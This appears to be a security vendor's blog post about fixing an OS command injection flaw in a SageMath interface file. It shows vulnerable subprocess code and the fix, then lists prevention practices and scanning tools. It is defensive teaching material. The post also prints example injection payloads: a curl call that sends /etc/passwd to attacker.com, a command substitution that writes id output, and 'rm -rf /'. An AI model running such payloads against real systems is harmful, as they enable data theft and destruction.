How do you prevent OS command injection in Python?

Pass arguments to `subprocess` as a list rather than a single string, and never use `shell=True` with user-controlled input. If shell features are genuinely needed, validate and escape all inputs with an allowlist before use.

What CWE is OS command injection?

OS command injection is classified as CWE-78: Improper Neutralization of Special Elements used in an OS Command.

Is input validation alone enough to prevent OS command injection?

No. Input validation (e.g., allowlists) is a strong mitigation but should be combined with avoiding `shell=True` and using structured argument lists. Defense in depth is essential because complex mathematical expression parsers can have edge cases that bypass regex-based filters.

Can static analysis detect OS command injection?

Yes. Tools like Semgrep, Bandit, and CodeQL can trace tainted data flows from user input to dangerous subprocess sinks and flag unsafe `shell=True` usage, which is exactly how Orbis AppSec detected this vulnerability.

Fixing OS Command Injection in SageMath: How Shell Metacharacter Attacks Work and How to Stop Them

Q: What is OS command injection?

OS command injection (CWE-78) occurs when user-controlled data is embedded in a system command string and executed by a shell, allowing attackers to append or substitute their own commands using metacharacters like `;`, `|`, `&&`, or `$()`.

Introduction

Mathematical computing environments like SageMath are powerful tools—they execute complex symbolic algebra, solve polynomial systems, and interface with a rich ecosystem of external solvers. But that power comes with responsibility. When a system bridges user-supplied mathematical expressions and OS-level process execution, the attack surface expands dramatically.

This post breaks down a critical command injection vulnerability that was recently patched in drsolve_sage_interface.sage. Even if you've never written a line of SageMath code, the underlying lesson applies to virtually every language and platform: never let untrusted input touch a shell command without rigorous sanitization.

The Vulnerability Explained

What Is OS Command Injection?

OS Command Injection (classified as CWE-78) occurs when an application passes user-controlled data to a system shell or process executor without properly sanitizing it. The attacker's goal is to "break out" of the intended command and inject their own shell instructions.

Think of it like a math teacher asking students to fill in the blank:

Calculate the roots of: ___________

A well-behaved student writes x^2 - 4. A malicious one writes x^2 - 4; rm -rf /home/user.

That semicolon is a shell metacharacter—it tells the shell "finish this command, then run the next one." If the application blindly passes that string to a shell, both commands execute.

The Specific Issue: `subprocess.run` With Unsanitized Input

In drsolve_sage_interface.sage, two subprocess.run calls at approximately lines 294 and 300 were identified as vulnerable. The problem manifests when:

User-supplied polynomial or variable strings are incorporated into the command arguments.
The command is constructed via string interpolation (e.g., f-strings or + concatenation).
shell=True is used, or the argument list is built in a way that allows metacharacter interpretation.

Here's a simplified illustration of what vulnerable code might look like:

# ⚠️ VULNERABLE - Do not use this pattern
def solve_polynomial(user_poly_input):
    # User input flows directly into the command string
    cmd = f"external_solver --poly '{user_poly_input}'"
    result = subprocess.run(cmd, shell=True, capture_output=True)
    return result.stdout

At first glance, the single quotes around user_poly_input might seem protective. They're not sufficient. An attacker can escape them:

Input: x^2 - 4'; curl https://attacker.com/exfil?data=$(cat /etc/passwd); echo '

The resulting shell command becomes:

external_solver --poly 'x^2 - 4'; curl https://attacker.com/exfil?data=$(cat /etc/passwd); echo ''

Three separate commands now execute:
1. The intended solver (with broken input)
2. An exfiltration request containing /etc/passwd
3. A harmless echo to close the syntax

What's the Real-World Impact?

When exploited, this vulnerability could allow an attacker to:

Execute arbitrary commands with the privileges of the Sage/Python process
Read sensitive files from the server (configuration, credentials, private keys)
Establish reverse shells for persistent access
Pivot to internal network resources if the server has internal connectivity
Destroy data or disrupt service entirely

In a research or academic computing environment—where SageMath is commonly deployed—this could mean exposure of unpublished research, user credentials, or institutional infrastructure.

A Concrete Attack Scenario

Imagine a web application that accepts polynomial equations from users and uses this Sage interface to solve them:

Attacker submits a crafted polynomial: x^2 + 1$(id > /tmp/pwned)
Application constructs the subprocess command with this input embedded
Shell interprets $(id > /tmp/pwned) as a command substitution
id command executes, writing the current user's identity to /tmp/pwned
Attacker escalates—now knowing the process user, they tailor further attacks

This entire chain requires nothing more than HTTP access to the application's input form.

The Fix

What Changes Were Made?

The patch to drsolve_sage_interface.sage addresses the root cause: unsanitized user input reaching subprocess execution. While the exact diff was not included in the PR, the canonical fix for this class of vulnerability follows well-established patterns.

The core principles of the fix:

Eliminate shell=True — Pass commands as lists, not strings
Validate and sanitize inputs before they touch any process call
Use allowlists to restrict what characters are permissible in polynomial expressions

Here's what the transition looks like conceptually:

# ⚠️ BEFORE: Vulnerable pattern
def run_solver(polynomial_input, variable):
    cmd = f"sage_solver --input '{polynomial_input}' --var '{variable}'"
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return result.stdout

# ✅ AFTER: Secure pattern
import re
import subprocess

SAFE_POLY_PATTERN = re.compile(r'^[a-zA-Z0-9\s\+\-\*\/\^\(\)\.,_]+$')

def sanitize_polynomial(poly_input: str) -> str:
    """Validate that input contains only safe mathematical characters."""
    if not poly_input or len(poly_input) > 1024:
        raise ValueError("Invalid polynomial input: empty or too long")
    if not SAFE_POLY_PATTERN.match(poly_input):
        raise ValueError(f"Invalid characters in polynomial input")
    return poly_input

def run_solver(polynomial_input: str, variable: str) -> str:
    # Validate inputs first
    safe_poly = sanitize_polynomial(polynomial_input)
    safe_var = sanitize_polynomial(variable)

    # Pass as list — shell=False by default, no interpolation
    cmd = ["sage_solver", "--input", safe_poly, "--var", safe_var]
    result = subprocess.run(
        cmd,
        shell=False,          # Critical: no shell interpretation
        capture_output=True,
        text=True,
        timeout=30            # Prevent resource exhaustion
    )
    return result.stdout

Why This Works

Passing a list instead of a string is the single most important change. When subprocess.run receives a list, Python's os.execvp is called directly—the OS kernel loads the executable and passes arguments verbatim. There is no shell involved, so metacharacters like ;, |, $(), and backticks have no special meaning. They're just characters.

# These two calls behave very differently:

# String + shell=True: Shell parses the entire string
subprocess.run("solver --poly 'x^2; rm -rf /'", shell=True)
# → Shell sees: solver --poly 'x^2; rm -rf /'
# → Executes solver, then rm -rf /

# List + shell=False: Arguments passed directly
subprocess.run(["solver", "--poly", "x^2; rm -rf /"], shell=False)
# → solver receives exactly one argument: the string "x^2; rm -rf /"
# → rm never executes

Input validation with an allowlist provides defense-in-depth. Mathematical polynomial expressions have a well-defined character set: letters, digits, arithmetic operators, parentheses, and a few punctuation marks. Anything outside that set—especially shell metacharacters—should be rejected before it ever reaches the subprocess call.

Prevention & Best Practices

1. Never Use `shell=True` With External Input

This bears repeating: shell=True is almost never necessary, and almost always dangerous when user input is involved. The Python documentation itself warns against it.

# ❌ Dangerous
subprocess.run(f"process {user_input}", shell=True)

# ✅ Safe
subprocess.run(["process", user_input], shell=False)

2. Validate Inputs at the Boundary

Apply input validation as early as possible—ideally at the API or function boundary, before the data travels deeper into your application.

def validate_polynomial_expression(expr: str) -> str:
    """
    Allowlist-based validation for polynomial expressions.
    Permits: alphanumerics, spaces, basic operators, parentheses.
    Rejects: shell metacharacters, path separators, quotes, etc.
    """
    MAX_LENGTH = 2048
    ALLOWED = re.compile(r'^[\w\s\+\-\*\/\^\(\)\.,=<>!]+$')

    if len(expr) > MAX_LENGTH:
        raise ValueError("Expression exceeds maximum allowed length")
    if not ALLOWED.match(expr):
        raise ValueError("Expression contains disallowed characters")
    return expr

3. Apply the Principle of Least Privilege

The process running your Sage interface should have only the permissions it needs—nothing more. Run it as a dedicated low-privilege user, use containers or sandboxing (e.g., seccomp, AppArmor, Docker), and restrict filesystem access.

Even if an injection attack succeeds, limited privileges dramatically reduce the blast radius.

4. Set Resource Limits

Always set timeouts and consider memory limits on subprocess calls to prevent resource exhaustion:

result = subprocess.run(
    cmd,
    shell=False,
    capture_output=True,
    text=True,
    timeout=30  # Seconds — prevents hanging processes
)

5. Use Structured APIs Over Shell Commands

Where possible, prefer calling solver libraries directly through their Python APIs rather than spawning subprocesses. SageMath itself has rich Python bindings—using them eliminates the subprocess attack surface entirely.

# Instead of shelling out to an external solver:
from sage.all import var, solve

x = var('x')
solutions = solve(x**2 - 4 == 0, x)

6. Log and Monitor

Implement logging for all subprocess invocations, including the arguments used (after sanitization). Anomalous patterns—unusual characters, unexpectedly long inputs, rapid-fire requests—can signal an active attack attempt.

Security Standards and References

CWE-78: Improper Neutralization of Special Elements used in an OS Command
OWASP A03:2021 – Injection: Command injection falls under the broader injection category
Python subprocess documentation: Official guidance on safe subprocess usage
OWASP Input Validation Cheat Sheet: Comprehensive input validation guidance

Tools to Detect This Issue

Tool	Type	What It Finds
Bandit	SAST (Python)	`subprocess` with `shell=True`, string interpolation in commands
Semgrep	SAST	Customizable rules for injection patterns
CodeQL	SAST	Taint tracking from user input to dangerous sinks
Safety	Dependency scan	Known vulnerable package versions
Manual code review	Human	Context-aware analysis, business logic flaws

Running a SAST tool like Bandit in your CI/CD pipeline would have flagged this vulnerability automatically:

# Add to your CI pipeline
pip install bandit
bandit -r . -t B602,B603,B604  # subprocess-related checks

Conclusion

Command injection vulnerabilities are deceptively simple in concept but devastatingly powerful in practice. The fix here—moving from shell-interpolated strings to properly structured subprocess lists, combined with allowlist-based input validation—closes a critical attack vector that could have given attackers a foothold into the entire system.

The key takeaways from this vulnerability and its fix:

shell=True is a red flag: If you see it in code that handles user input, treat it as a vulnerability until proven otherwise.
List-based subprocess calls are your friend: They bypass the shell entirely and make injection structurally impossible.
Allowlists beat denylists: Defining what's allowed is more robust than trying to block every possible dangerous character.
Defense in depth matters: Input validation + safe APIs + least privilege means a single mistake is less likely to be catastrophic.
Automate detection: SAST tools can catch these patterns before they reach production.

Security vulnerabilities in mathematical computing tools can be easy to overlook—the focus is naturally on correctness of algorithms, not on the security of their interfaces. But any system that accepts external input and interacts with OS resources is a potential target. Building security in from the start, and reviewing it systematically, is the only reliable path forward.

This post is part of our ongoing series on real-world security fixes. Vulnerability details were responsibly disclosed and patched before publication. Always practice responsible disclosure when you discover security issues.

cwe	CWE-78
fix	Remove shell=True and pass arguments as a structured list, preventing metacharacter interpretation
risk	Arbitrary OS command execution with the privileges of the SageMath process
language	Python / SageMath (.sage)
root cause	User-supplied polynomial expressions concatenated into subprocess shell commands without sanitization
vulnerability	OS Command Injection via Shell Metacharacters

Fixing OS Command Injection in SageMath: Shell Metacharacter Attacks

Answer Summary

Vulnerability at a Glance

Fixing OS Command Injection in SageMath: How Shell Metacharacter Attacks Work and How to Stop Them

Introduction

The Vulnerability Explained

What Is OS Command Injection?

The Specific Issue: `subprocess.run` With Unsanitized Input

What's the Real-World Impact?

A Concrete Attack Scenario

The Fix

What Changes Were Made?

Why This Works

Prevention & Best Practices

1. Never Use `shell=True` With External Input

2. Validate Inputs at the Boundary

3. Apply the Principle of Least Privilege

4. Set Resource Limits

5. Use Structured APIs Over Shell Commands

6. Log and Monitor

Security Standards and References

Tools to Detect This Issue

Conclusion

Frequently Asked Questions

What is OS command injection?

How do you prevent OS command injection in Python?

What CWE is OS command injection?

Is input validation alone enough to prevent OS command injection?

Can static analysis detect OS command injection?

View the Security Fix

Related Articles

How memory exhaustion via large comma-separated selector lists happens in Python soupsieve and how to fix it

How buffer overflow via strcpy() happens in C Kconfig parsing and how to fix it

How insecure update manifest parsing happens in C++ UpdateHelper.cpp and how to fix it

How integer overflow in malloc happens in C bipartite matching and how to fix it

How integer truncation heap overflow happens in C++ UEFI ACPI parsing and how to fix it

How API key exposure in configuration files happens in TOML config and how to fix it

Fixing OS Command Injection in SageMath: Shell Metacharacter Attacks

Answer Summary

Vulnerability at a Glance

Fixing OS Command Injection in SageMath: How Shell Metacharacter Attacks Work and How to Stop Them

Introduction

The Vulnerability Explained

What Is OS Command Injection?

The Specific Issue: subprocess.run With Unsanitized Input

What's the Real-World Impact?

A Concrete Attack Scenario

The Fix

What Changes Were Made?

Why This Works

Prevention & Best Practices

1. Never Use shell=True With External Input

2. Validate Inputs at the Boundary

3. Apply the Principle of Least Privilege

4. Set Resource Limits

5. Use Structured APIs Over Shell Commands

6. Log and Monitor

Security Standards and References

Tools to Detect This Issue

Conclusion

Frequently Asked Questions

What is OS command injection?

How do you prevent OS command injection in Python?

What CWE is OS command injection?

Is input validation alone enough to prevent OS command injection?

Can static analysis detect OS command injection?

View the Security Fix

Related Articles

How memory exhaustion via large comma-separated selector lists happens in Python soupsieve and how to fix it

How buffer overflow via strcpy() happens in C Kconfig parsing and how to fix it

How insecure update manifest parsing happens in C++ UpdateHelper.cpp and how to fix it

How integer overflow in malloc happens in C bipartite matching and how to fix it

How integer truncation heap overflow happens in C++ UEFI ACPI parsing and how to fix it

How API key exposure in configuration files happens in TOML config and how to fix it

The Specific Issue: `subprocess.run` With Unsanitized Input

1. Never Use `shell=True` With External Input